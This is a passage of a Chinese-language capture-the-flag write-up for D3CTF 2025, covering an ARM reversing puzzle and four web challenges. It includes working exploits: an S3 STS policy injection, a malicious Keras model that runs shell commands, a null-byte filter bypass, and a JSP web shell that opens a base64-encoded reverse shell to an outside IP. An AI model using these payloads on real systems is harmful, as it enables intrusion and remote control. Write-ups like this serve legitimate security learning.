v[p] = self.int32(v[p] - self.mx(z, y, sum_, p, e))
y = v[p]
z = v[n]
v[0] = self.int32(v[0] - self.mx(z, y, sum_, 0, e))
y = v[0]
sum_ = self.int32(sum_ - self.DELTA)

return self.longs_to_str(v, True)

if __name__ == "__main__":
ciphertext = "LhVvfepywFIsHb8G8kNdu49J3k0="
key = "rpgmakerxp_D3CTF"

decryptor = SecretDecryptor(key)
plaintext = decryptor.decrypt(ciphertext)

print(f"解密结果: {plaintext}")

AliceInPuzzle

main里提取elf字节为puzzle,反编译发现arm代码存在很多反编译失败的地方,很多字符串调用没找到

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
__int64 *__fastcall handle_sigtrap(int a1)
{//...
++handle_sigtrap(int)::sig_count;
if ( !(__int64)ptrace(PTRACE_GETREGSET, a1, (void *)1) )
{
v3 = v10;
v4 = ptrace(PTRACE_PEEKTEXT, a1, v10);
v5 = v4;
v6 = (_DWORD *)_errno_location(v4);
if ( !*v6 && v5 == 0xD4200000 )
{
while ( 1 )
{
v7 = ptrace(PTRACE_PEEKTEXT, a1, v3);
if ( *v6 )
break;
v8 = v7 + 0xE3201F;
ptrace(PTRACE_POKETEXT, a1, v3);
if ( *v6 || v8 == v5 )
break;
v3 += 4;
}
}
}
return &_stack_chk_guard;
}

分析main tracer_main函数可以发现对不同父子进程通讯情况做了不同处理,其中handle_sigtrap存在读取和写入操作

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
__int64 *__fastcall handle_sigtrap(int a1)
{//...
++handle_sigtrap(int)::sig_count;
if ( !(__int64)ptrace(PTRACE_GETREGSET, a1, (void *)1) )
{
v3 = v10;
v4 = ptrace(PTRACE_PEEKTEXT, a1, v10);
v5 = v4;
v6 = (_DWORD *)_errno_location(v4);
if ( !*v6 && v5 == 0xD4200000 )
{
while ( 1 )
{
v7 = ptrace(PTRACE_PEEKTEXT, a1, v3);
if ( *v6 )
break;
v8 = v7 + 0xE3201F;
ptrace(PTRACE_POKETEXT, a1, v3);
if ( *v6 || v8 == v5 )
break;
v3 += 4;
}
}
}
return &_stack_chk_guard;
}

分析可知ptrace-PTRACE_PEEKTEXT读取4字节并比较是否等于0xD4200000,然后循环处理每四字节+0xE3201F,推测此处为patch puzzle的代码逻辑

在puzzle中用idapython复现出patch逻辑,gpt改了好几版才patch出一个勉强可以看懂逻辑的puzzle代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
import ida_bytes
import idc

# ——————————— 参数区域 ———————————
START_EA = 0x401E4C # 扫描 / 补丁区间起始地址(包含)
END_EA = 0x40215C # 扫描 / 补丁区间结束地址(不包含)
TRAP_INSN = 0xD4200000 # “陷阱指令” 32-bit 值 (小端字节序: 00 00 20 D4)
PATCH_OFFSET = 0x00E3201F # 补丁时加到原始值上的偏移
# ——————————————————————————————————————————————

def find_next_trap():
"""从头开始查找下一个 0xD4200000 指令地址,未找到返回 None"""
ea = START_EA
while ea < END_EA:
val = ida_bytes.get_wide_dword(ea)
if val == TRAP_INSN:
return ea
ea += 4
return None

def patch_from(ea_start):
"""
从 ea_start 开始 patch,每次将当前地址的指令加 PATCH_OFFSET。
如果 patch 后的 new_val 是 TRAP_INSN,则停止 patch。
"""
print(f"[*] 开始 patch @ 0x{ea_start:X}")
ea = ea_start
while ea < END_EA:
orig = ida_bytes.get_wide_dword(ea)
new_val = (orig + PATCH_OFFSET) & 0xFFFFFFFF
ida_bytes.patch_dword(ea, new_val)

if new_val == TRAP_INSN:
print(f" → 在 0x{ea:X} patch 出新 trap(0x{new_val:08X}),停止本轮")
break
ea += 4
return

def main():
print("[*] 开始循环 patch 所有 TRAP_INSN...")
iteration = 1

while True:
trap_ea = find_next_trap()
if trap_ea is None:
print("[*] 所有 TRAP_INSN 已处理完毕,退出。")
break
print(f"\n=== 第 {iteration} 次处理 ===")
patch_from(trap_ea)
iteration += 1

print("[*] 脚本执行完毕,请手动保存或导出补丁。")

if __name__ == "__main__":
main()

Puzzle check逻辑如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
void __fastcall sub_401E54(..)
{//..
v21 = &byte_5A0040;
v22 = 0;
v23 = 0;
v24 = 0;
do
{
v25 = (*v21 & 0x7F) << v24;
v24 += 7;
v23 |= v25;
if ( (*v21 & 0x80) == 0 )
{
dword_5A1B80[v22++] = v23;
v24 = 0;
v23 = 0;
}
++v21;
}
while ( v21 != (char *)&unk_5A007F );
printf("[Alice] Hey there, brave challenger~ ");
printf("[Alice] I'm Alice, and you've just stepped into my little puzzle world! ");
printf("[Alice] The board is all set up and ready to go... Are you feeling ready to take on the challenge? ");
printf("[Alice] Now, show me your solution when you're ready!");
((void (__fastcall *)(__int64, __int64 *))loc_5062B0)(2LL, &qword_52CAB8);
a15 = &a17;
a16 = 0LL;
v32 = *(_QWORD *)off_59FB28[0];
LOBYTE(a17) = 0;
v33 = *(_QWORD *)(v32 - 24) + off_59FB28[0];
v34 = *(_QWORD *)(v33 + 240);
if ( v34 )
{
if ( *(_BYTE *)(v34 + 56) )
{
sub_404360((_QWORD *)off_59FB28[0], (__int64)&a15, *(_BYTE *)(v34 + 67));
v35 = (__int64)a15;
v36 = sub_4F3600((__int64)a15, 0x7Bu);
v37 = sub_4F3600(v35, 0x7Du);
if ( v36 )
v45 = v37 == 0;
else
v45 = 1;
if ( v45 || (v46 = v36 + 1, v36 + 1 >= v37) )
sub_4022DC();
v47 = v37 - v46;
a19 = &a21;
a20 = 0LL;
if ( (__int64)(v37 - v46) <= 15 )
{
if ( v47 == 1 )
{
LOBYTE(a21) = *(_BYTE *)(v36 + 1);
JUMPOUT(0x401FB0LL);
}
sub_4021D0();
}
else
{
sub_402264(..);
}
}
else
{
sub_402214(*(unsigned __int8 *)(v34 + 56), off_59FB28[0], v26, v27, v28, v29, v30, v31);
}
}
else
{
sub_4022B4(v33, off_59FB28[0], v26, v27, v28, v29, v30, v31);
}
}
__int64 __fastcall sub_401FE8(...)
{//...
sub_4CD9C0(a1, 19LL);
v49 = ((__int64 (__fastcall *)(__int64, __int64, __int64))loc_401D00)(v48, v45, v46);
if ( (int)a14 <= 0 )
return sub_40228C(v49);
v51 = (int)a14;
v52 = 0LL;
v53 = 0;
LODWORD(v54) = 0;
for ( i = 1LL; ; ++i )
{
v56 = (*(_BYTE *)(v45 + i - 1) & 0x7F) << v54;
v54 = (unsigned int)(v54 + 7);
v53 |= v56;
if ( (*(_BYTE *)(v45 + i - 1) & 0x80) == 0 )
{
*((_DWORD *)&a23 + (int)v52) = v53;
v52 = (unsigned int)(v52 + 1);
v54 = 0LL;
v53 = 0;
}
if ( i == (int)a14 )
break;
}
v57 = &unk_5A1000;
v58 = &dword_5A1B80[24];
*(_OWORD *)&dword_5A1B80[24] = a23;
*(_OWORD *)&dword_5A1B80[28] = a24;
*(_OWORD *)&dword_5A1B80[32] = a25;
*(_OWORD *)&dword_5A1B80[36] = a26;
*(_OWORD *)&dword_5A1B80[40] = a27;
LOBYTE(dword_5A1B80[44]) = a28;
v59 = dword_5A1B80;
for ( j = 0LL; j != 81; ++j )
{
v61 = (unsigned int)*((char *)dword_5A1B80 + j);
if ( *((_BYTE *)dword_5A1B80 + j) )
{
v54 = (unsigned int)*((char *)&dword_5A1B80[24] + j);
if ( (_DWORD)v54 != (_DWORD)v61 )
return sub_402294(dword_5A1B80);
}
}
v62 = (char *)&byte_5A1B20;
v63 = 1;
v64 = &dword_5A1B80[24];
do
{
for ( k = 0LL; k != 9; ++k )
{
v66 = *((char *)v64 + k);
if ( *((_BYTE *)v64 + k) )
{
v67 = v62[k];
if ( (v67 & 1) == 0 )
{
v59 = (_DWORD *)sub_401BD0(v47, (unsigned int)k, v66, &dword_5A1B80[24]);
if ( v66 != (_DWORD)v59 )
v63 = v67;
}
}
}
++v47;
v62 += 9;
v64 = (_DWORD *)((char *)v64 + 9);
}
while ( v47 != 9 );
if ( (v63 & 1) != 0 )
{
printf("[Alice] Wow! You're really smart! ");
printf("[Alice] As a reward, I'll give you a little flag~");
printf("[Alice] D3CTF{replace_with_md5_inside}");
JUMPOUT(0x402154LL);
}
return sub_4021F8(..);
}

第一个函数首先做了Leb128解码操作,从byte_5A0040还原出puzzle

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
s = [0x80, 0x8C, 0x80, 0x30, 0x80, 0x80, 0x80, 0x10, 0x80, 0x80, 0x0C, 0x82, 0x08, 0x80, 0x02, 0x86, 0x80, 0x80, 0x20, 0x84, 0x86, 0x18, 0x80, 0x84, 0x18, 0x86, 0x0C, 0x80, 0x8E, 0x1C, 0x80, 0x80, 0x94, 0x40, 0x80, 0x80, 0x80, 0x20, 0x87, 0x80, 0x98, 0x18, 0x80, 0x80, 0x94, 0x30, 0x86, 0x0C, 0x00, 0x86, 0x80, 0x18, 0x80, 0x8C, 0x20, 0x80, 0x80, 0x80, 0x10, 0x80, 0x80, 0x18, 0x08]
v23, v24 = 0, 0
c = []
for i in range(len(s)):
v25 = (s[i] & 0x7f) << v24
v24 += 7
v23 |= v25
if s[i] & 0x80 == 0:
c.append(v23)
v24 = 0
v23 = 0
c = list(b"".join([i.to_bytes(4, byteorder='little') for i in c]))
for i in range(9):
for j in range(9):
print(c[i*9+j], end="")
print()

按照后面第二个函数取了9*9 81个数进行打印,得到了一个像迷宫、扫雷、数独。。。的东西

1
2
3
4
5
6
7
8
9
060600020
030240001
006004436
002606600
077000580
004706300
566600000
060600680
000200608

最后分析sub_401BD0函数,它是一个递归遍历的逻辑,gpt分析了下发现和连通图有关系,就是检查一个数字x要保证该数字相接的数字里有x个x,大概手算了下正好81个数填满,所以直接先手动填充了一些比较好确认的数如8、7、2等,然后gpt分析直接给出唯一解

1
2
3
4
5
6
7
8
9
366666622
332244331
666654436
622656666
477755586
444776388
566676338
566676688
555226688

接下来要逆向还原输入,首先输入做了一个逆向字符串,然后字符串转为hex值,然后做了LEB128解码得到最终比较字符串,只需逆向逻辑即可

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
def encode_uleb128(value: int) -> bytes:
"""
按照 LEB128/VLQ 规则,把一个无符号整数编码为若干字节。
- 每次取最低 7 位放入一个字节的低 7 位,高位(0x80)表示后面还有字节。
- 直到 value 变为 0 为止,且最后一个字节的高位不置 1。
"""
result = bytearray()
while True:
byte = value & 0x7F
value >>= 7
if value != 0: # 如果 value 还没耗尽,就把这一位的高位设成 1,表示“后续还有更多字节”
byte |= 0x80
result.append(byte)
if value == 0:
break
return bytes(result)

s = "366666622332244331666654436622656666477755586444776388566676338566676688555226688"
b = b"".join(bytes([int(i)]) for i in s)
c = []
for i in range(0, len(b), 4):
c.append(int.from_bytes(b[i:i+4], byteorder='little'))
final = b""
for i in c:
final += encode_uleb128(i)
print(final.hex()[::-1]) # 800489c8280149a858040ac8688389c868820a683803c9c868034909888189e878020988680449a85883c9e8480389c86882894828038968480249c868038928388109882801c868280189c8680389c838

得到的结果做md5加密即为flag d3ctf{a6410f9a866c52763c11bce9fb8b06ca}

Web

D3Invitation

这道题本质是一个针对签发的 STS token 具有的 Policy 进行注入的过程,在 API

1
2
3
4
5
POST  /api/genSTSCreds 

{
"object_name": "injection point"
}

中通过 参数 object_name 进行注入

例如

我们可以使 object_name 为 * ,

此时 STSToken (JWT)中的 payload 部分的 policy decode base64 后,可以得到签发的 policy 为

1
{"Version":"2012-10-17","Statement":[{"Effect":"Allow","Action":["s3:GetObject","s3:PutObject"],"Resource":["arn:aws:s3:::d3invitation/*"]}]}

也就是我们现在签发的 AKSKSTS 具有的权限为 对 Bucket D3invtation 上传或获取文件

由于没有进行转义和过滤,那么我们可以注入 payload

使得最后的 payload 形如

1
2
3
4
5
6
7
8
{
"Version": "2012-10-17",
"Statement": [
{"Effect": "Allow", "Action": ["s3:GetObject", "s3:PutObject"], "Resource": ["arn:aws:s3:::d3invitation/*", "arn:aws:s3:::flag/*"]},
{"Effect": "Allow", "Action": ["s3:ListBucket"], "Resource": ["arn:aws:s3:::d3invitation", "arn:aws:s3:::flag"]},
{"Effect": "Allow", "Action": ["s3:ListAllMyBuckets"], "Resource": ["*"]},
]
}

简单的计算后,可以得到注入内容为(也就是 object name)

1
*","arn:aws:s3:::flag/*"]},{"Effect":"Allow","Action":["s3:ListBucket"],"Resource":["arn:aws:s3:::d3invitation","arn:aws:s3:::flag"]},{"Effect":"Allow","Action":["s3:ListAllMyBuckets"],"Resource":["*

此时得到的 aksksts 后 使用 aws s3 进行利用

可以知道 flag 存放在 flag 桶的 /flag object 中

d3model

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
import keras
from flask import Flask, request, jsonify
import os


def is_valid_model(modelname):
try:
keras.models.load_model(modelname)
except:
return False
return True

app = Flask(__name__)

@app.route('/', methods=['GET'])
def index():
return open('index.html').read()


@app.route('/upload', methods=['POST'])
def upload_file():
if 'file' not in request.files:
return jsonify({'error': 'No file part'}), 400

file = request.files['file']

if file.filename == '':
return jsonify({'error': 'No selected file'}), 400

MAX_FILE_SIZE = 50 * 1024 * 1024 # 50MB
file.seek(0, os.SEEK_END)
file_size = file.tell()
file.seek(0)

if file_size > MAX_FILE_SIZE:
return jsonify({'error': 'File size exceeds 50MB limit'}), 400

filepath = os.path.join('./', 'test.keras')
if os.path.exists(filepath):
os.remove(filepath)
file.save(filepath)

if is_valid_model(filepath):
return jsonify({'message': 'Model is valid'}), 200
else:
return jsonify({'error': 'Invalid model file'}), 400

if __name__ == '__main__':
app.run(host='0.0.0.0', port=5000)

很明显,最开始我们可以进行反序列化RCE,文章 https://blog.huntr.com/inside-cve-2025-1550-remote-code-execution-via-keras-models, python的话比较好处理,我们并不知道是否出网,所以直接覆盖HTMl文件的内容即可

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
import zipfile
import json
from keras.models import Sequential
from keras.layers import Dense
import numpy as np
import os
model_name="model.keras"

x_train = np.random.rand(100, 28*28)
y_train = np.random.rand(100)

model = Sequential([Dense(1, activation='linear', input_dim=28*28)])

model.compile(optimizer='adam', loss='mse')
model.fit(x_train, y_train, epochs=5)
model.save(model_name)

with zipfile.ZipFile(model_name,"r") as f:
config=json.loads(f.read("config.json").decode())

config["config"]["layers"][0]["module"]="keras.models"
config["config"]["layers"][0]["class_name"]="Model"
config["config"]["layers"][0]["config"]={
"name":"mvlttt",
"layers":[
{
"name":"mvlttt",
"class_name":"function",
"config":"Popen",
"module": "subprocess",
"inbound_nodes":[{"args":[["bash","-c","env>/app/index.html"]],"kwargs":{"bufsize":-1}}]
}],
"input_layers":[["mvlttt", 0, 0]],
"output_layers":[["mvlttt", 0, 0]]
}

with zipfile.ZipFile(model_name, 'r') as zip_read:
with zipfile.ZipFile(f"tmp.{model_name}", 'w') as zip_write:
for item in zip_read.infolist():
if item.filename != "config.json":
zip_write.writestr(item, zip_read.read(item.filename))

os.remove(model_name)
os.rename(f"tmp.{model_name}",model_name)


with zipfile.ZipFile(model_name,"a") as zf:
zf.writestr("config.json",json.dumps(config))

print("[+] Malicious model ready")

上传虽然会报错,但是依然是解析了的,刷新即可

tidy quic

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
package main

import (
"bytes"
"errors"
"github.com/libp2p/go-buffer-pool"
"github.com/quic-go/quic-go/http3"
"io"
"log"
"net/http"
"os"
)

var p pool.BufferPool
var ErrWAF = errors.New("WAF")

func main() {
go func() {
err := http.ListenAndServeTLS(":8080", "./server.crt", "./server.key", &mux{})
log.Fatalln(err)
}()
go func() {
err := http3.ListenAndServeQUIC(":8080", "./server.crt", "./server.key", &mux{})
log.Fatalln(err)
}()
select {}
}

type mux struct {
}

func (*mux) ServeHTTP(w http.ResponseWriter, r *http.Request) {
if r.Method == http.MethodGet {
_, _ = w.Write([]byte("Hello D^3CTF 2025,I'm tidy quic in web."))
return
}
if r.Method != http.MethodPost {
w.WriteHeader(400)
return
}

var buf []byte
length := int(r.ContentLength)
if length == -1 {
var err error
buf, err = io.ReadAll(textInterrupterWrap(r.Body))
if err != nil {
if errors.Is(err, ErrWAF) {
w.WriteHeader(400)
_, _ = w.Write([]byte("WAF"))
} else {
w.WriteHeader(500)
_, _ = w.Write([]byte("error"))
}
return
}
} else {
buf = p.Get(length)
defer p.Put(buf)
rd := textInterrupterWrap(r.Body)
i := 0
for {
n, err := rd.Read(buf[i:])
if err != nil {
if errors.Is(err, io.EOF) {
break
} else if errors.Is(err, ErrWAF) {
w.WriteHeader(400)
_, _ = w.Write([]byte("WAF"))
return
} else {
w.WriteHeader(500)
_, _ = w.Write([]byte("error"))
return
}
}
i += n
}
}
if !bytes.HasPrefix(buf, []byte("I want")) {
_, _ = w.Write([]byte("Sorry I'm not clear what you want."))
return
}
item := bytes.TrimSpace(bytes.TrimPrefix(buf, []byte("I want")))
if bytes.Equal(item, []byte("flag")) {
_, _ = w.Write([]byte(os.Getenv("FLAG")))
} else {
_, _ = w.Write(item)
}
}

type wrap struct {
io.ReadCloser
ban []byte
idx int
}

func (w *wrap) Read(p []byte) (int, error) {
n, err := w.ReadCloser.Read(p)
if err != nil && !errors.Is(err, io.EOF) {
return n, err
}
for i := 0; i < n; i++ {
if p[i] == w.ban[w.idx] {
w.idx++
if w.idx == len(w.ban) {
return n, ErrWAF
}
} else {
w.idx = 0
}
}
return n, err
}

func textInterrupterWrap(rc io.ReadCloser) io.ReadCloser {
return &wrap{
rc, []byte("flag"), 0,
}
}

核心代码如上,起初我看到这题,我以为要进行请求走私,一直在搜索这个框架有没有类似的NDAY然后再进行修改来绕过,但是没找到相关资料,我们的目标就是POST一个I want flag但是后续内容如果被提取成flag就会寄,测试发现用\0绕过即可,使用curl进行http3请求会比较方便,当然你也可以写python脚本,看自己选择了 https://curl.se/

1
2
x=$'I want \0flag'
curl -X POST https://35.241.98.126:31956 -d "$x" -v --insecure --http3 -H "Content-Length: 11"

D3jtar

jtar解压时忽略了中文后的内容,因此使用以下exp完成

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
import requests

url = "http://34.150.83.54:32217/"

payload = '''<%@ page import="java.io.*" %>
<%
response.setContentType("text/html;charset=UTF-8");
Process process = null;
BufferedReader reader = null;
String line = null;
StringBuilder output = new StringBuilder();
try {
process = Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny4xMDkuMTUxLjE2OC82NjY2IDA+JjE=}|{base64,-d}|{bash,-i}");
reader = new BufferedReader(new InputStreamReader(process.getInputStream()));
while ((line = reader.readLine()) != null) {
output.append(line + "\\n");
}
process.waitFor();
} catch (Exception e) {
output.append("Error executing command: ").append(e.getMessage());
} finally {
if (reader != null) {
try { reader.close(); } catch (IOException e) {}
}
if (process != null) {
process.destroy();
}
}
%>
<%= output.toString() %>'''

def upload():
u = url + "Upload"
r = requests.post(u, files={'file': ("a.jsp耀", payload)})
return r.text

def view(page):
u = url + "view"
r = requests.get(u, params={'page': page, "cmd": "ls /"})
print(r.text)

def tar():
u = url + "BackUp"
r = requests.post(u, data={"op": "tar"})
print(r.text)

def untar():
u = url + "BackUp"
r = requests.post(u, data={"op": "untar"})
print(r.text)


r = upload().split(": ")[1].split(".")[0]
print(r)
tar()
untar()
view(r)

解包的时候中文被忽略了,直接反弹shell

Author

SUers

Posted on

2025-06-02

Updated on

2025-06-03

Licensed under